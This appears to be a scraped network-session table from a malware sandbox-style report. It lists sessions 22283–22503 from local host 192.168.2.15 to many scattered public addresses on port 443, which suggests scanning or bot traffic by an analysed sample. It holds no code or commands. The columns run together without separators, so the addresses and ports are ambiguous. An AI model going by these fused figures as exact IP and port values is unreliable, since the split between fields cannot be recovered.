                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22283192.168.2.1535572185.90.47.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22284192.168.2.1535958168.66.69.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22285192.168.2.154079898.54.234.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22286192.168.2.1546268185.85.174.25443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22287192.168.2.15519464.209.160.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22288192.168.2.155217063.47.144.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22289192.168.2.15411489.198.244.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22290192.168.2.155337468.59.109.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22291192.168.2.1537210184.137.136.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22292192.168.2.155720284.128.120.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22293192.168.2.1558756144.40.122.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22294192.168.2.1554702218.102.116.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22295192.168.2.1533622217.173.98.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22296192.168.2.1538970176.109.249.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22297192.168.2.1534348167.52.136.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22298192.168.2.155963289.217.112.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22299192.168.2.1542288154.123.134.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22300192.168.2.1558476218.86.226.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22301192.168.2.1551036108.107.5.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22302192.168.2.1541584121.168.80.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22303192.168.2.1535806217.216.22.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22304192.168.2.1540796109.22.64.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22305192.168.2.1554634137.232.133.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22306192.168.2.1534570195.216.146.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22307192.168.2.1545784177.78.176.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22308192.168.2.1542414152.194.251.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22309192.168.2.153920093.255.236.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22310192.168.2.153602431.77.131.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22311192.168.2.1556708114.236.135.154443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22312192.168.2.1538410218.38.170.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22313192.168.2.155826091.8.179.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22314192.168.2.156093813.139.231.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22315192.168.2.1535990160.82.49.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22316192.168.2.1536408210.75.193.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22317192.168.2.154873691.124.45.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22318192.168.2.1550932145.145.239.191443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22319192.168.2.153413251.17.178.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22320192.168.2.1546308206.88.127.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22321192.168.2.1553870189.146.126.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22322192.168.2.15596325.63.76.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22323192.168.2.1537174118.59.108.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22324192.168.2.1541368119.2.135.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22325192.168.2.1551798101.126.84.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22326192.168.2.153706084.124.245.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22327192.168.2.155084080.75.217.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22328192.168.2.153291460.141.49.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22329192.168.2.155091442.233.35.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22330192.168.2.153597257.251.93.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22331192.168.2.153756032.225.76.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22332192.168.2.1536220205.160.220.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22333192.168.2.1552580116.138.19.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22334192.168.2.1541724165.218.79.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22335192.168.2.155575071.116.251.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22336192.168.2.1557096179.111.255.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22337192.168.2.1560232186.38.7.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22338192.168.2.1543356210.24.215.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22339192.168.2.1540486136.248.74.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22340192.168.2.1541394182.215.23.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22341192.168.2.153973884.199.208.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22342192.168.2.15469068.67.234.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22343192.168.2.1558418194.40.244.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22344192.168.2.153511681.5.98.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22345192.168.2.1538060168.78.159.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22346192.168.2.1550392186.111.44.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22347192.168.2.155849613.5.21.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22348192.168.2.155097889.129.65.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22349192.168.2.1554846206.96.120.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22350192.168.2.1554130123.198.40.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22351192.168.2.154285417.137.218.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22352192.168.2.1548866126.57.156.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22353192.168.2.155620090.237.110.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22354192.168.2.1551788190.238.242.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22355192.168.2.1555208192.188.59.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22356192.168.2.1551442206.54.79.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22357192.168.2.1560728175.182.103.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22358192.168.2.1541476104.120.96.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22359192.168.2.1536456193.10.176.206443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22360192.168.2.154324686.54.115.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22361192.168.2.1536286103.174.108.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22362192.168.2.1533290103.138.206.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22363192.168.2.155682858.43.78.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22364192.168.2.155158044.131.106.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22365192.168.2.155662865.76.125.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22366192.168.2.15333721.40.245.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22367192.168.2.1552908102.3.212.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22368192.168.2.153703895.231.180.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22369192.168.2.1558356135.132.188.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22370192.168.2.1541314174.237.235.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22371192.168.2.153655070.152.79.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22372192.168.2.1560426132.157.217.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22373192.168.2.1537588161.24.177.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22374192.168.2.155296488.228.12.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22375192.168.2.1538950222.131.127.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22376192.168.2.1541440177.201.16.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22377192.168.2.155516490.3.69.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22378192.168.2.154892080.166.132.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22379192.168.2.154917223.92.155.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22380192.168.2.155038079.227.122.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22381192.168.2.1543886124.240.254.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22382192.168.2.1558864109.31.51.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22383192.168.2.155381694.24.93.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22384192.168.2.1550166125.123.181.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22385192.168.2.155664638.229.231.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22386192.168.2.153870844.137.70.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22387192.168.2.1555542207.131.5.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22388192.168.2.153655831.213.157.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22389192.168.2.154458458.170.195.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22390192.168.2.1550880222.162.36.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22391192.168.2.1547976177.237.191.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22392192.168.2.1543592206.174.33.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22393192.168.2.1542186105.208.168.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22394192.168.2.1532996109.85.66.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22395192.168.2.1552376168.190.146.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22396192.168.2.155398032.41.116.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22397192.168.2.1533520136.199.81.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22398192.168.2.1538054216.116.160.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22399192.168.2.155214624.255.208.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22400192.168.2.155868271.180.104.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22401192.168.2.153845093.84.124.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22402192.168.2.1559282119.221.1.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22403192.168.2.153420267.23.224.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22404192.168.2.1547396201.155.30.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22405192.168.2.1534336133.199.70.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22406192.168.2.1557110218.198.153.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22407192.168.2.1544552123.125.197.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22408192.168.2.1540494155.249.26.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22409192.168.2.155635470.244.69.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22410192.168.2.1551924157.211.37.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22411192.168.2.1533798221.242.63.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22412192.168.2.1542378168.182.163.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22413192.168.2.1536544189.180.129.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22414192.168.2.1533780109.4.245.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22415192.168.2.1557478174.67.9.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22416192.168.2.1548472131.149.172.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22417192.168.2.1547592100.137.174.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22418192.168.2.1542594188.64.206.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22419192.168.2.1535700107.199.162.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22420192.168.2.155532473.4.193.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22421192.168.2.1549798163.81.117.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22422192.168.2.1548932140.122.25.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22423192.168.2.153700034.44.226.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22424192.168.2.1544242118.69.133.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22425192.168.2.1538478201.84.25.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22426192.168.2.153808653.42.167.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22427192.168.2.1547008142.192.183.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22428192.168.2.1552440160.244.87.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22429192.168.2.1555688123.6.171.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22430192.168.2.1540578174.72.62.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22431192.168.2.154195694.185.207.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22432192.168.2.155850646.203.69.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22433192.168.2.1560674182.186.48.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22434192.168.2.1550708189.100.29.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22435192.168.2.153941217.227.26.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22436192.168.2.155025662.48.46.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22437192.168.2.156076441.153.89.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22438192.168.2.1552974117.126.116.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22439192.168.2.154657414.152.120.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22440192.168.2.153693024.143.93.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22441192.168.2.1548384108.217.244.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22442192.168.2.1547144193.26.150.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22443192.168.2.1552176152.201.181.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22444192.168.2.1559308166.224.162.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22445192.168.2.1554402212.193.97.59443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22446192.168.2.1555538217.45.197.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22447192.168.2.156019063.113.91.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22448192.168.2.155905081.233.85.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22449192.168.2.1551560159.25.52.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22450192.168.2.1540794178.103.199.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22451192.168.2.155653063.150.156.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22452192.168.2.1556532185.154.121.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22453192.168.2.1555720219.172.105.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22454192.168.2.1544992171.242.48.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22455192.168.2.1558538176.172.32.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22456192.168.2.1542800212.251.146.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22457192.168.2.1550322115.106.185.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22458192.168.2.1550426218.31.89.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22459192.168.2.155063066.21.111.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22460192.168.2.155441297.26.175.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22461192.168.2.1545162196.33.244.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22462192.168.2.1545706189.7.175.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22463192.168.2.154689657.42.176.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22464192.168.2.155207093.140.208.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22465192.168.2.1554148112.163.214.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22466192.168.2.153882058.24.22.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22467192.168.2.1537170136.119.108.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22468192.168.2.1544990148.149.42.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22469192.168.2.153320238.160.119.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22470192.168.2.1536210165.24.200.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22471192.168.2.1545470153.27.230.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22472192.168.2.1539338122.89.55.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22473192.168.2.1537328146.21.128.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22474192.168.2.153800612.211.113.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22475192.168.2.1535308181.241.109.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22476192.168.2.153469095.75.228.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22477192.168.2.15395905.67.112.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22478192.168.2.155878288.92.82.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22479192.168.2.156033247.121.199.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22480192.168.2.1541854129.226.68.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22481192.168.2.1558330113.235.18.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22482192.168.2.1533370141.125.252.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22483192.168.2.153423679.60.116.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22484192.168.2.154316857.116.223.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22485192.168.2.155384641.48.74.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22486192.168.2.1553830179.12.204.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22487192.168.2.1535462160.21.116.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22488192.168.2.1560758136.56.128.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22489192.168.2.1543552131.233.40.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22490192.168.2.153746271.133.59.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22491192.168.2.153399037.146.170.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22492192.168.2.1544400177.197.135.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22493192.168.2.153337861.70.3.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22494192.168.2.1540238100.173.147.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22495192.168.2.155511288.55.200.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22496192.168.2.1547158195.49.238.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22497192.168.2.1540192103.232.77.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22498192.168.2.1559476140.97.160.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22499192.168.2.154003653.207.29.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22500192.168.2.1556440115.176.162.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22501192.168.2.1557078128.122.209.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22502192.168.2.154880644.9.51.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            22503192.168.2.1540892161.37.60.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
